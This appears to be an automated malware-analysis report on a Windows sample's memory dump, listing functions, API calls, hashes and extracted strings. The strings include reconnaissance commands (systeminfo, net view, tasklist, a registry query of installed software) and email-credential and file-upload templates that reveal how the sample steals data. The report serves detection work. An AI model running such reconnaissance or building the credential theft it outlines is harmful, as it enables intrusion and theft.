                                                                                                                                        • nslookup 127.0.0.1 >, xrefs: 00446CE6
                                                                                                                                        • wmic computersystem get domain |more , xrefs: 00446C97
                                                                                                                                        • systeminfo.exe >, xrefs: 00446CB6
                                                                                                                                        • reg.exe query "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall" /s >, xrefs: 00446D28
                                                                                                                                        • tasklist.exe /SVC >, xrefs: 00446CFC
                                                                                                                                        • net view >, xrefs: 00446CD0
                                                                                                                                        Memory Dump Source
                                                                                                                                        • Source File: 00000000.00000002.426105865.0000000000440000.00000040.00000001.sdmp, Offset: 00440000, based on PE: false
                                                                                                                                        Yara matches
                                                                                                                                        Similarity
                                                                                                                                        • API ID: Temp$FilePathTime$CurrentFreeHeapNameSystemThreadlstrcpy
                                                                                                                                        • String ID: driverquery.exe >$net view >$nslookup 127.0.0.1 >$reg.exe query "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall" /s >$systeminfo.exe >$tasklist.exe /SVC >$wmic computersystem get domain |more
                                                                                                                                        • API String ID: 3485239229-3033342
                                                                                                                                        • Opcode ID: 35dc8046c797b9afb5e08fba4f22c879deb7c2c07236a69fa68176d7f7a0fb3f
                                                                                                                                        • Instruction ID: ab74d506b086d771e2e8a5b01ce40e1a36d6e2701cdd406fcdf491a0b083260e
                                                                                                                                        • Opcode Fuzzy Hash: 35dc8046c797b9afb5e08fba4f22c879deb7c2c07236a69fa68176d7f7a0fb3f
                                                                                                                                        • Instruction Fuzzy Hash: CE21F8F3E016B2239731365A5C86E6B59998683F5471B036BFED077351A98D9C0042EF
                                                                                                                                        Uniqueness

                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                        Function 0045A977, Relevance: 12.1, APIs: 8, Instructions: 72memorystringCOMMON
                                                                                                                                        Download Yara Rule
                                                                                                                                        APIs
                                                                                                                                        • lstrlenW.KERNEL32(?,00000000,?,?,00000001,00000001,?,00455F7A,?,?,?,?), ref: 0045A99B
                                                                                                                                        • RtlAllocateHeap.NTDLL(00000000,00000001), ref: 0045A9AD
                                                                                                                                        • wcstombs.NTDLL ref: 0045A9BB
                                                                                                                                        • lstrlen.KERNEL32(00000000,00000000,?,?,00000001,00000001,?,00455F7A,?,?,?,?,?), ref: 0045A9DF
                                                                                                                                        • RtlAllocateHeap.NTDLL(00000000,00000002), ref: 0045A9F4
                                                                                                                                        • mbstowcs.NTDLL ref: 0045AA01
                                                                                                                                        • HeapFree.KERNEL32(00000000,00000000,?,?,00000001,00000001,?,00455F7A,?,?,?,?,?), ref: 0045AA13
                                                                                                                                        • HeapFree.KERNEL32(00000000,00000000,00000001,00000001,?,00455F7A,?,?,?,?,?), ref: 0045AA2D
                                                                                                                                        Memory Dump Source
                                                                                                                                        • Source File: 00000000.00000002.426105865.0000000000440000.00000040.00000001.sdmp, Offset: 00440000, based on PE: false
                                                                                                                                        Yara matches
                                                                                                                                        Similarity
                                                                                                                                        • API ID: Heap$AllocateFreelstrlen$mbstowcswcstombs
                                                                                                                                        • String ID:
                                                                                                                                        • API String ID: 316328430-0
                                                                                                                                        • Opcode ID: 14d67dfd29e13a233ece89c4e424075f614317e4bb69a7c190366217633e8876
                                                                                                                                        • Instruction ID: 485054b509435fb889cc3c89797e59bea10fc92d6d97e310c0acf8f2dbf7201a
                                                                                                                                        • Opcode Fuzzy Hash: 14d67dfd29e13a233ece89c4e424075f614317e4bb69a7c190366217633e8876
                                                                                                                                        • Instruction Fuzzy Hash: C8217F71900249FFCF108FA4EC08F9B7B79EB44305F104635FA05A11A1EBB59D69DB6A
                                                                                                                                        Uniqueness

                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                        Function 00454388, Relevance: 12.1, APIs: 8, Instructions: 52registryCOMMON
                                                                                                                                        Download Yara Rule
                                                                                                                                        APIs
                                                                                                                                        • OpenProcess.KERNEL32(00000040,00000000,?), ref: 00454394
                                                                                                                                        • RegCreateKeyA.ADVAPI32(80000001,?,?), ref: 004543B2
                                                                                                                                        • RegOpenKeyA.ADVAPI32(80000001,?,?), ref: 004543BA
                                                                                                                                        • DuplicateHandle.KERNEL32(?,00000000,?,00000000,00000000,00000002), ref: 004543D8
                                                                                                                                        • GetLastError.KERNEL32 ref: 004543EC
                                                                                                                                        • RegCloseKey.ADVAPI32(?), ref: 004543F7
                                                                                                                                        • CloseHandle.KERNEL32(00000000), ref: 004543FE
                                                                                                                                        • GetLastError.KERNEL32 ref: 00454406
                                                                                                                                        Memory Dump Source
                                                                                                                                        • Source File: 00000000.00000002.426105865.0000000000440000.00000040.00000001.sdmp, Offset: 00440000, based on PE: false
                                                                                                                                        Yara matches
                                                                                                                                        Similarity
                                                                                                                                        • API ID: CloseErrorHandleLastOpen$CreateDuplicateProcess
                                                                                                                                        • String ID:
                                                                                                                                        • API String ID: 3822162776-0
                                                                                                                                        • Opcode ID: be068137a2038d6c686870a199138700c6927584bed11a66bdec4a9921d64725
                                                                                                                                        • Instruction ID: 0b1410a3f36d6d95703815e53615103da97c6b44217b06b85ffac61e52116dec
                                                                                                                                        • Opcode Fuzzy Hash: be068137a2038d6c686870a199138700c6927584bed11a66bdec4a9921d64725
                                                                                                                                        • Instruction Fuzzy Hash: 08116135200209FFDB015F90DC48F6A3B69EB84356F114426FE06CA261EBB4CD58DB3A
                                                                                                                                        Uniqueness

                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                        Function 004656ED, Relevance: 10.7, APIs: 2, Strings: 5, Instructions: 208stringCOMMON
                                                                                                                                        Download Yara Rule
                                                                                                                                        APIs
                                                                                                                                        • lstrlen.KERNEL32(?), ref: 00465804
                                                                                                                                        • lstrlen.KERNEL32(142A03F6), ref: 00465812
                                                                                                                                          • Part of subcall function 0045315A: lstrlen.KERNEL32(?,00000104,?,00000000,004657EA,142E03F5,?), ref: 00453165
                                                                                                                                          • Part of subcall function 0045315A: lstrcpy.KERNEL32(00000000,?), ref: 00453181
                                                                                                                                        Strings
                                                                                                                                        Memory Dump Source
                                                                                                                                        • Source File: 00000000.00000002.426105865.0000000000440000.00000040.00000001.sdmp, Offset: 00440000, based on PE: false
                                                                                                                                        Yara matches
                                                                                                                                        Similarity
                                                                                                                                        • API ID: lstrlen$lstrcpy
                                                                                                                                        • String ID: IMAP$POP3$SMTP$_iF$type=%S, name=%S, address=%S, server=%S, port=%u, ssl=%S, user=%S, password=%S
                                                                                                                                        • API String ID: 805584807-4214221636
                                                                                                                                        • Opcode ID: c8b89e2bb908993b5ec8c6f7db05018e188c0747291045dce2612d51724644b0
                                                                                                                                        • Instruction ID: 4d4579715b798e7d3e667f09621c3100dd20c8cd23707a8947be4c6655af939f
                                                                                                                                        • Opcode Fuzzy Hash: c8b89e2bb908993b5ec8c6f7db05018e188c0747291045dce2612d51724644b0
                                                                                                                                        • Instruction Fuzzy Hash: 76712871900519EBCF21DFA5C8859EFBBB8FF08705F10456AF905A7201E7389A51CF9A
                                                                                                                                        Uniqueness

                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                        Function 00463C76, Relevance: 10.6, APIs: 6, Strings: 1, Instructions: 137stringCOMMON
                                                                                                                                        Download Yara Rule
                                                                                                                                        APIs
                                                                                                                                          • Part of subcall function 0044B053: ExpandEnvironmentStringsW.KERNEL32(00000000,00000000,00000000,?,00000000,?,00441A29,?), ref: 0044B064
                                                                                                                                          • Part of subcall function 0044B053: ExpandEnvironmentStringsW.KERNEL32(00000000,00000000,00000000,00000000,?,00000000,?,00441A29,?), ref: 0044B081
                                                                                                                                        • lstrlenW.KERNEL32(00000000,00000000,75D706E0,00000020,00750025,80000001), ref: 00463CBC
                                                                                                                                        • lstrlenW.KERNEL32(00000008), ref: 00463CC3
                                                                                                                                        • lstrlenW.KERNEL32(?,?), ref: 00463CDF
                                                                                                                                        • lstrlen.KERNEL32 ref: 00463D59
                                                                                                                                        • lstrlenW.KERNEL32(?), ref: 00463D65
                                                                                                                                        • wsprintfA.USER32 ref: 00463D93
                                                                                                                                          • Part of subcall function 0044EB0A: RtlFreeHeap.NTDLL(00000000,00000000,00456D9D,00000000), ref: 0044EB16
                                                                                                                                        Strings
                                                                                                                                        Memory Dump Source
                                                                                                                                        • Source File: 00000000.00000002.426105865.0000000000440000.00000040.00000001.sdmp, Offset: 00440000, based on PE: false
                                                                                                                                        Yara matches
                                                                                                                                        Similarity
                                                                                                                                        • API ID: lstrlen$EnvironmentExpandStrings$FreeHeapwsprintf
                                                                                                                                        • String ID: _iF
                                                                                                                                        • API String ID: 3384896299-3005318356
                                                                                                                                        • Opcode ID: acf9707acdbf39e0c72ec3dcfb32ea25dcf996a548386a3ce5763d15581d3095
                                                                                                                                        • Instruction ID: 90a8fb1493db96dca3283d121a456eaa76a17d2d58eb5cf33e00fa4b2f067fd1
                                                                                                                                        • Opcode Fuzzy Hash: acf9707acdbf39e0c72ec3dcfb32ea25dcf996a548386a3ce5763d15581d3095
                                                                                                                                        • Instruction Fuzzy Hash: 0D417FB1900109AFDB01EFA6CC45DAE7BF9FF44304B04446AF80597222EBB5EA14CF69
                                                                                                                                        Uniqueness

                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                        Function 004511FA, Relevance: 10.6, APIs: 7, Instructions: 125memorystringCOMMON
                                                                                                                                        Download Yara Rule
                                                                                                                                        APIs
                                                                                                                                        • lstrlen.KERNEL32(00000000,?), ref: 00451253
                                                                                                                                        • lstrlen.KERNEL32(?,?), ref: 00451271
                                                                                                                                        • RtlAllocateHeap.NTDLL(00000000,74B06985,?), ref: 0045129A
                                                                                                                                        • memcpy.NTDLL(00000000,00000000,00000000), ref: 004512B1
                                                                                                                                        • HeapFree.KERNEL32(00000000,00000000), ref: 004512C4
                                                                                                                                        • memcpy.NTDLL(00000000,?,?), ref: 004512D3
                                                                                                                                        • HeapFree.KERNEL32(00000000,00000000,?,?,?), ref: 00451337
                                                                                                                                          • Part of subcall function 00453C8D: RtlLeaveCriticalSection.NTDLL(?), ref: 00453D0A
                                                                                                                                        Memory Dump Source
                                                                                                                                        • Source File: 00000000.00000002.426105865.0000000000440000.00000040.00000001.sdmp, Offset: 00440000, based on PE: false
                                                                                                                                        Yara matches
                                                                                                                                        Similarity
                                                                                                                                        • API ID: Heap$Freelstrlenmemcpy$AllocateCriticalLeaveSection
                                                                                                                                        • String ID:
                                                                                                                                        • API String ID: 1635816815-0
                                                                                                                                        • Opcode ID: 52487bd10cb58ab5438131c2a93319fd61e7090b6a7b4c062d1946e1acf114e2
                                                                                                                                        • Instruction ID: d85a823f37de3cf2f5bcaf862b2075a5dc5a88c13d4dfac5b5476d836d8fe07b
                                                                                                                                        • Opcode Fuzzy Hash: 52487bd10cb58ab5438131c2a93319fd61e7090b6a7b4c062d1946e1acf114e2
                                                                                                                                        • Instruction Fuzzy Hash: 5B41D031900208BBDB219FA5CC84B9E7BB4EF04356F01456AFC04A6272D7789E58DB99
                                                                                                                                        Uniqueness

                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                        Function 00450D0B, Relevance: 10.6, APIs: 4, Strings: 2, Instructions: 108synchronizationCOMMON
                                                                                                                                        Download Yara Rule
                                                                                                                                        APIs
                                                                                                                                        • GetLastError.KERNEL32 ref: 00450E2B
                                                                                                                                          • Part of subcall function 00458DE2: RtlAllocateHeap.NTDLL(00000000,?,00449CAD), ref: 00458DEE
                                                                                                                                        • GetLastError.KERNEL32 ref: 00450D9F
                                                                                                                                        • WaitForSingleObject.KERNEL32(00000000), ref: 00450DAF
                                                                                                                                        • GetLastError.KERNEL32 ref: 00450DCF
                                                                                                                                        Strings
                                                                                                                                        Memory Dump Source
                                                                                                                                        • Source File: 00000000.00000002.426105865.0000000000440000.00000040.00000001.sdmp, Offset: 00440000, based on PE: false
                                                                                                                                        Yara matches
                                                                                                                                        Similarity
                                                                                                                                        • API ID: ErrorLast$AllocateHeapObjectSingleWait
                                                                                                                                        • String ID: mF$ImF
                                                                                                                                        • API String ID: 35602742-2157277370
                                                                                                                                        • Opcode ID: 413fd9fb0df96b92f60ef2f570843de89c7b72ccaae2725c418a9eccc43f3cd3
                                                                                                                                        • Instruction ID: 431086f0b9563cf72e97b39c1f2441985f9bb0aa468bab17e077428de9f4085c
                                                                                                                                        • Opcode Fuzzy Hash: 413fd9fb0df96b92f60ef2f570843de89c7b72ccaae2725c418a9eccc43f3cd3
                                                                                                                                        • Instruction Fuzzy Hash: 7141FE74D00209EFDF10DFD5C9855AEBBB5FB04346F20486AE901E6252E7749E48DB16
                                                                                                                                        Uniqueness

                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                        Function 00444B81, Relevance: 10.6, APIs: 2, Strings: 4, Instructions: 97COMMON
                                                                                                                                        Download Yara Rule
                                                                                                                                        Strings
                                                                                                                                        Memory Dump Source
                                                                                                                                        • Source File: 00000000.00000002.426105865.0000000000440000.00000040.00000001.sdmp, Offset: 00440000, based on PE: false
                                                                                                                                        Yara matches
                                                                                                                                        Similarity
                                                                                                                                        • API ID: AllocateHeap
                                                                                                                                        • String ID: 8jF$Email$\gF$hnF
                                                                                                                                        • API String ID: 1279760036-2714262774
                                                                                                                                        • Opcode ID: 351ef8ef3fb38926f5ed7a7cf1d221fb54b8f17fcb1c6802bd9f3b0d43c694a7
                                                                                                                                        • Instruction ID: 47eeff6bf8ce04a0f0079222b2383556a718372ac788ec0e85ce787d08dde75f
                                                                                                                                        • Opcode Fuzzy Hash: 351ef8ef3fb38926f5ed7a7cf1d221fb54b8f17fcb1c6802bd9f3b0d43c694a7
                                                                                                                                        • Instruction Fuzzy Hash: 6931ADB1508209BFEB119F51CC84E6BBFADFB84398F00092EFA8590061D735DD55DB66
                                                                                                                                        Uniqueness

                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                        Function 0045F0D4, Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 95memorystringCOMMON
                                                                                                                                        Download Yara Rule
                                                                                                                                        APIs
                                                                                                                                        • RtlAllocateHeap.NTDLL(00000000,00000007), ref: 0045F156
                                                                                                                                        • lstrcpy.KERNEL32(00000000,grabs=), ref: 0045F168
                                                                                                                                        • lstrcpyn.KERNEL32(00000006,00000000,00000001,?,?,?,?,?,00000000,00000000,?), ref: 0045F175
                                                                                                                                        • lstrlen.KERNEL32(grabs=,?,?,?,?,?,00000000,00000000,?), ref: 0045F187
                                                                                                                                        • HeapFree.KERNEL32(00000000,00000000,00000000,00000000,00000000,00000000,?,0000000D,00000000,?,?,?,?,?,00000000,00000000), ref: 0045F1B8
                                                                                                                                        Strings
                                                                                                                                        Memory Dump Source
                                                                                                                                        • Source File: 00000000.00000002.426105865.0000000000440000.00000040.00000001.sdmp, Offset: 00440000, based on PE: false
                                                                                                                                        Yara matches
                                                                                                                                        Similarity
                                                                                                                                        • API ID: Heap$AllocateFreelstrcpylstrcpynlstrlen
                                                                                                                                        • String ID: grabs=
                                                                                                                                        • API String ID: 2734445380-3012740322
                                                                                                                                        • Opcode ID: 769b42fdb1b5997343b35c74bda37f8b4ee7d2e1dd3ad48b3b7fefc5035783f5
                                                                                                                                        • Instruction ID: 114a41e1193346b230e7e9441dd145acb9a734ed905435291776d0caff07489c
                                                                                                                                        • Opcode Fuzzy Hash: 769b42fdb1b5997343b35c74bda37f8b4ee7d2e1dd3ad48b3b7fefc5035783f5
                                                                                                                                        • Instruction Fuzzy Hash: 95317C32900208FFCB119F95DC49EDF7BB9EF44321F04452AFD0492212EB789959CBA9
                                                                                                                                        Uniqueness

                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                        Function 0045B4F4, Relevance: 10.6, APIs: 7, Instructions: 93fileCOMMON
                                                                                                                                        Download Yara Rule
                                                                                                                                        APIs
                                                                                                                                          • Part of subcall function 0045D8E5: GetSystemTimeAsFileTime.KERNEL32(?,?,00000000,?,?,?,?,?,?,?,?,?,0045B50C,?,?,00000000), ref: 0045D8F1
                                                                                                                                          • Part of subcall function 0045D8E5: _aulldiv.NTDLL(?,00000000,54D38000,00000192), ref: 0045D907
                                                                                                                                          • Part of subcall function 0045D8E5: _snwprintf.NTDLL ref: 0045D92C
                                                                                                                                          • Part of subcall function 0045D8E5: CreateFileMappingW.KERNEL32(000000FF,0046E0F8,00000004,00000000,00001000,?,?,?,00000000,54D38000,00000192), ref: 0045D948
                                                                                                                                          • Part of subcall function 0045D8E5: GetLastError.KERNEL32(?,?,00000000,54D38000,00000192,?,?,?,?,?,?,?,?,?,0045B50C,?), ref: 0045D95A
                                                                                                                                          • Part of subcall function 0045D8E5: CloseHandle.KERNEL32(00000000,?,?,00000000,54D38000,00000192,?,?,?,?,?,?,?,?,?,0045B50C), ref: 0045D992
                                                                                                                                        • UnmapViewOfFile.KERNEL32(?,?,?,00000000,00000001,?,00000000), ref: 0045B52B
                                                                                                                                        • CloseHandle.KERNEL32(?), ref: 0045B534
                                                                                                                                        • Wow64EnableWow64FsRedirection.KERNEL32(00000000), ref: 0045B554
                                                                                                                                        • Wow64EnableWow64FsRedirection.KERNEL32(00000001), ref: 0045B57A
                                                                                                                                        • SetEvent.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,?,0045DB81,?), ref: 0045B5B3
                                                                                                                                        • GetLastError.KERNEL32(Function_000068FB,00000000,00000000), ref: 0045B5E2
                                                                                                                                        • CloseHandle.KERNEL32(00000000,Function_000068FB,00000000,00000000), ref: 0045B5F2
                                                                                                                                          • Part of subcall function 00450CB4: lstrlenW.KERNEL32(?,00000000,00000000,74B05520,?,?,004424EC,?), ref: 00450CC0
                                                                                                                                          • Part of subcall function 00450CB4: memcpy.NTDLL(00000000,?,00000000,00000002,?,?,004424EC,?), ref: 00450CE8
                                                                                                                                          • Part of subcall function 00450CB4: memset.NTDLL ref: 00450CFA
                                                                                                                                        Memory Dump Source
                                                                                                                                        • Source File: 00000000.00000002.426105865.0000000000440000.00000040.00000001.sdmp, Offset: 00440000, based on PE: false
                                                                                                                                        Yara matches
                                                                                                                                        Similarity
                                                                                                                                        • API ID: Wow64$CloseFileHandle$EnableErrorLastRedirectionTime$CreateEventMappingSystemUnmapView_aulldiv_snwprintflstrlenmemcpymemset
                                                                                                                                        • String ID:
                                                                                                                                        • API String ID: 3181697882-0
                                                                                                                                        • Opcode ID: 4683a318e0621a4254b9c148ed0bdaa668d16ebfb001cd7b65dbb77d0319db60
                                                                                                                                        • Instruction ID: e32728766affc92901fbfe90c41f70fa87c4c6964acae302b9dc92571cc6a109
                                                                                                                                        • Opcode Fuzzy Hash: 4683a318e0621a4254b9c148ed0bdaa668d16ebfb001cd7b65dbb77d0319db60
                                                                                                                                        • Instruction Fuzzy Hash: AD312B35900318FBEB049B62CC447AE77B4EF4131AF10446BEC41D2151FB789D499B9E
                                                                                                                                        Uniqueness

                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                        Function 00442520, Relevance: 10.6, APIs: 7, Instructions: 89memorystringpipeCOMMON
                                                                                                                                        Download Yara Rule
                                                                                                                                        APIs
                                                                                                                                        • lstrlen.KERNEL32(?,00000000,00000000,74B05520,?,?,?,00441568,0000010D,00000000,00000000), ref: 00442550
                                                                                                                                        • RtlAllocateHeap.NTDLL(00000000,00000000,00000000), ref: 00442566
                                                                                                                                        • memcpy.NTDLL(00000010,?,00000000,?,?,?,00441568,0000010D), ref: 0044259C
                                                                                                                                        • memcpy.NTDLL(00000010,00000000,00441568,?,?,?,00441568), ref: 004425B7
                                                                                                                                        • CallNamedPipeA.KERNEL32(00000000,00000000,?,00000010,00000119,00000001), ref: 004425D5
                                                                                                                                        • GetLastError.KERNEL32(?,?,?,00441568), ref: 004425DF
                                                                                                                                        • HeapFree.KERNEL32(00000000,00000000,?,?,?,00441568), ref: 00442605
                                                                                                                                        Memory Dump Source
                                                                                                                                        • Source File: 00000000.00000002.426105865.0000000000440000.00000040.00000001.sdmp, Offset: 00440000, based on PE: false
                                                                                                                                        Yara matches
                                                                                                                                        Similarity
                                                                                                                                        • API ID: Heapmemcpy$AllocateCallErrorFreeLastNamedPipelstrlen
                                                                                                                                        • String ID:
                                                                                                                                        • API String ID: 2237239663-0
                                                                                                                                        • Opcode ID: e5699d52882f3c26147c09e9bee7a792ef8c3972c74e5905a7d581e473a583a2
                                                                                                                                        • Instruction ID: dc613bce9f3c2492495d21df67fa975f74efe899c2ddfdf8370191bc83d7bd3f
                                                                                                                                        • Opcode Fuzzy Hash: e5699d52882f3c26147c09e9bee7a792ef8c3972c74e5905a7d581e473a583a2
                                                                                                                                        • Instruction Fuzzy Hash: 4831AE36900209FFDB20CFA5DD44A9B7BB8FB04350F04483AFD09D2250E6B49A59DBA6
                                                                                                                                        Uniqueness

                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                        Function 0044339E, Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 85memorystringCOMMON
                                                                                                                                        Download Yara Rule
                                                                                                                                        APIs
                                                                                                                                          • Part of subcall function 0044B4D8: RtlEnterCriticalSection.NTDLL(0046E268), ref: 0044B4E0
                                                                                                                                          • Part of subcall function 0044B4D8: RtlLeaveCriticalSection.NTDLL(0046E268), ref: 0044B4F5
                                                                                                                                          • Part of subcall function 0044B4D8: InterlockedIncrement.KERNEL32(0000001C), ref: 0044B50E
                                                                                                                                        • RtlAllocateHeap.NTDLL(00000000,?,Blocked), ref: 004433CE
                                                                                                                                        • memcpy.NTDLL(00000000,?,?), ref: 004433DF
                                                                                                                                        • lstrcmpi.KERNEL32(00000002,?), ref: 00443425
                                                                                                                                        • memcpy.NTDLL(00000000,?,?), ref: 00443439
                                                                                                                                        • HeapFree.KERNEL32(00000000,00000000,Blocked), ref: 00443478
                                                                                                                                        Strings
                                                                                                                                        Memory Dump Source
                                                                                                                                        • Source File: 00000000.00000002.426105865.0000000000440000.00000040.00000001.sdmp, Offset: 00440000, based on PE: false
                                                                                                                                        Yara matches
                                                                                                                                        Similarity
                                                                                                                                        • API ID: CriticalHeapSectionmemcpy$AllocateEnterFreeIncrementInterlockedLeavelstrcmpi
                                                                                                                                        • String ID: Blocked
                                                                                                                                        • API String ID: 733514052-367579676
                                                                                                                                        • Opcode ID: 9c0ca157d4cda38371bf31050ce22e3bfa48810cb022af084495d64a01a0280a
                                                                                                                                        • Instruction ID: d2d03b4ba69ada8a367b27817f4d3e2280572cc185dc87fe444be1b37bfcb3b8
                                                                                                                                        • Opcode Fuzzy Hash: 9c0ca157d4cda38371bf31050ce22e3bfa48810cb022af084495d64a01a0280a
                                                                                                                                        • Instruction Fuzzy Hash: C021E771900214BFEB109FA5CC85A9F7B78FF04755F14403AFD05A2251EB798E44CB99
                                                                                                                                        Uniqueness

                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                        Function 00447C1B, Relevance: 10.6, APIs: 4, Strings: 2, Instructions: 75stringCOMMON
                                                                                                                                        Download Yara Rule
                                                                                                                                        APIs
                                                                                                                                        • memset.NTDLL ref: 00447C4A
                                                                                                                                        • lstrlen.KERNEL32(?), ref: 00447C5A
                                                                                                                                          • Part of subcall function 00458DE2: RtlAllocateHeap.NTDLL(00000000,?,00449CAD), ref: 00458DEE
                                                                                                                                        • strcpy.NTDLL ref: 00447C71
                                                                                                                                        • StrChrA.SHLWAPI(00000000,0000003A,00000001), ref: 00447C7B
                                                                                                                                        Strings
                                                                                                                                        Memory Dump Source
                                                                                                                                        • Source File: 00000000.00000002.426105865.0000000000440000.00000040.00000001.sdmp, Offset: 00440000, based on PE: false
                                                                                                                                        Yara matches
                                                                                                                                        Similarity
                                                                                                                                        • API ID: AllocateHeaplstrlenmemsetstrcpy
                                                                                                                                        • String ID: pgF$kF
                                                                                                                                        • API String ID: 528014985-1288129778
                                                                                                                                        • Opcode ID: 3e80a8b82dac4b5007aa4e1ec206c7b36d59692596b03e8fcc4199020777b1f5
                                                                                                                                        • Instruction ID: 799d3716e9337a747f2789126a57a2213d5b9b3b0ee47675f727040bf33110f3
                                                                                                                                        • Opcode Fuzzy Hash: 3e80a8b82dac4b5007aa4e1ec206c7b36d59692596b03e8fcc4199020777b1f5
                                                                                                                                        • Instruction Fuzzy Hash: 1821B071604301AFE720AF25DC89B2B77F8EF44315F10882AF85682291FBB8D845C71A
                                                                                                                                        Uniqueness

                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                        Function 00443BA4, Relevance: 10.6, APIs: 5, Strings: 2, Instructions: 74memorystringCOMMON
                                                                                                                                        Download Yara Rule
                                                                                                                                        APIs
                                                                                                                                        • lstrlen.KERNEL32(?,00000000,00000001,77E2EB70), ref: 00443BC4
                                                                                                                                          • Part of subcall function 00458DE2: RtlAllocateHeap.NTDLL(00000000,?,00449CAD), ref: 00458DEE
                                                                                                                                        • wsprintfA.USER32 ref: 00443BEE
                                                                                                                                          • Part of subcall function 0045B80F: GetSystemTimeAsFileTime.KERNEL32(?,00000008,00000000,00000000,?,?,?,?,?,?,?,?,?,?,?,0045E03B), ref: 0045B825
                                                                                                                                          • Part of subcall function 0045B80F: wsprintfA.USER32 ref: 0045B84D
                                                                                                                                          • Part of subcall function 0045B80F: lstrlen.KERNEL32(?), ref: 0045B85C
                                                                                                                                          • Part of subcall function 0045B80F: wsprintfA.USER32 ref: 0045B89C
                                                                                                                                          • Part of subcall function 0045B80F: wsprintfA.USER32 ref: 0045B8D1
                                                                                                                                          • Part of subcall function 0045B80F: memcpy.NTDLL(00000000,?,?), ref: 0045B8DE
                                                                                                                                          • Part of subcall function 0045B80F: memcpy.NTDLL(00000008,004683E4,00000002,00000000,?,?), ref: 0045B8F3
                                                                                                                                          • Part of subcall function 0045B80F: wsprintfA.USER32 ref: 0045B916
                                                                                                                                        • HeapFree.KERNEL32(00000000,?,?,?,?), ref: 00443C63
                                                                                                                                          • Part of subcall function 00465BFE: RtlEnterCriticalSection.NTDLL(03BD8D20), ref: 00465C14
                                                                                                                                          • Part of subcall function 00465BFE: RtlLeaveCriticalSection.NTDLL(03BD8D20), ref: 00465C2F
                                                                                                                                        • HeapFree.KERNEL32(00000000,?,?,00000000,00000001,?,?,?,?,00000000,00000000,?,?,?), ref: 00443C4B
                                                                                                                                        • HeapFree.KERNEL32(00000000,?), ref: 00443C57
                                                                                                                                        Strings
                                                                                                                                        • Content-Type: application/octet-stream, xrefs: 00443BE0
                                                                                                                                        • Content-Disposition: form-data; name="upload_file"; filename="%s", xrefs: 00443BE8
                                                                                                                                        Memory Dump Source
                                                                                                                                        • Source File: 00000000.00000002.426105865.0000000000440000.00000040.00000001.sdmp, Offset: 00440000, based on PE: false
                                                                                                                                        Yara matches
                                                                                                                                        Similarity
                                                                                                                                        • API ID: wsprintf$Heap$Free$CriticalSectionTimelstrlenmemcpy$AllocateEnterFileLeaveSystem
                                                                                                                                        • String ID: Content-Disposition: form-data; name="upload_file"; filename="%s"$Content-Type: application/octet-stream
                                                                                                                                        • API String ID: 3553201432-2405033784
                                                                                                                                        • Opcode ID: bc1bd36d4b4402e86172d95323f6c3d29b9f81215fee715c02dd64be938ff90d
                                                                                                                                        • Instruction ID: e19f60b7d2778cf6d7efbb40d1c1e7d9e676811eac8c71a7392b2b0ac0d901e3
                                                                                                                                        • Opcode Fuzzy Hash: bc1bd36d4b4402e86172d95323f6c3d29b9f81215fee715c02dd64be938ff90d
                                                                                                                                        • Instruction Fuzzy Hash: 63214876800249BBCF119F96DC44DCFBFB9FF58700F000426F915A2121E7B58A24DBA9
                                                                                                                                        Uniqueness

                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                        Function 0044BD81, Relevance: 10.6, APIs: 2, Strings: 5, Instructions: 72stringCOMMON
                                                                                                                                        Download Yara Rule
                                                                                                                                        APIs
                                                                                                                                        • lstrlen.KERNEL32(?,74B05520,?,00000000,?,?,0046331D,?,00000000,00000000,00000000,00000000,?,?,?,?), ref: 0044BD92
                                                                                                                                          • Part of subcall function 00458DE2: RtlAllocateHeap.NTDLL(00000000,?,00449CAD), ref: 00458DEE
                                                                                                                                          • Part of subcall function 0044B764: memset.NTDLL ref: 0044B76C
                                                                                                                                          • Part of subcall function 0045383E: lstrlen.KERNEL32(74B05520,00000008,?,00000000,?,?,0044DA9C,74B05520,74B05520,00000000,00000008,0000EA60,00000000,?,?,0045F5E5), ref: 0045384A
                                                                                                                                          • Part of subcall function 0045383E: memcpy.NTDLL(00000000,74B05520,74B05520,74B05520,00000001,00000001,?,?,0044DA9C,74B05520,74B05520,00000000,00000008,0000EA60,00000000), ref: 004538A8
                                                                                                                                          • Part of subcall function 0045383E: lstrcpy.KERNEL32(00000000,00000000), ref: 004538B8
                                                                                                                                        • lstrcpy.KERNEL32(00000038,?), ref: 0044BDCD
                                                                                                                                        Strings
                                                                                                                                        Memory Dump Source
                                                                                                                                        • Source File: 00000000.00000002.426105865.0000000000440000.00000040.00000001.sdmp, Offset: 00440000, based on PE: false
                                                                                                                                        Yara matches
                                                                                                                                        Similarity
                                                                                                                                        • API ID: lstrcpylstrlen$AllocateHeapmemcpymemset
                                                                                                                                        • String ID: Accept-Encoding:$Connection:$GET$Host:$User-Agent:
                                                                                                                                        • API String ID: 3405161297-3467890120
                                                                                                                                        • Opcode ID: 96ce9a0220d874d1a92843c252b74d989721d5a0e389ad170927cac0adee6872
                                                                                                                                        • Instruction ID: b4fb6f31b0e849be66bb948fdd3d7ee324c9bde6221610bd0ea0b2e970282aa8
                                                                                                                                        • Opcode Fuzzy Hash: 96ce9a0220d874d1a92843c252b74d989721d5a0e389ad170927cac0adee6872
                                                                                                                                        • Instruction Fuzzy Hash: 5C11C8716002047B9B107FB7DC86E9F7AACEF80359710002BF901D2202EF7CE94596AE
                                                                                                                                        Uniqueness

                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                        Function 00457CFC, Relevance: 10.6, APIs: 7, Instructions: 71filememoryCOMMON
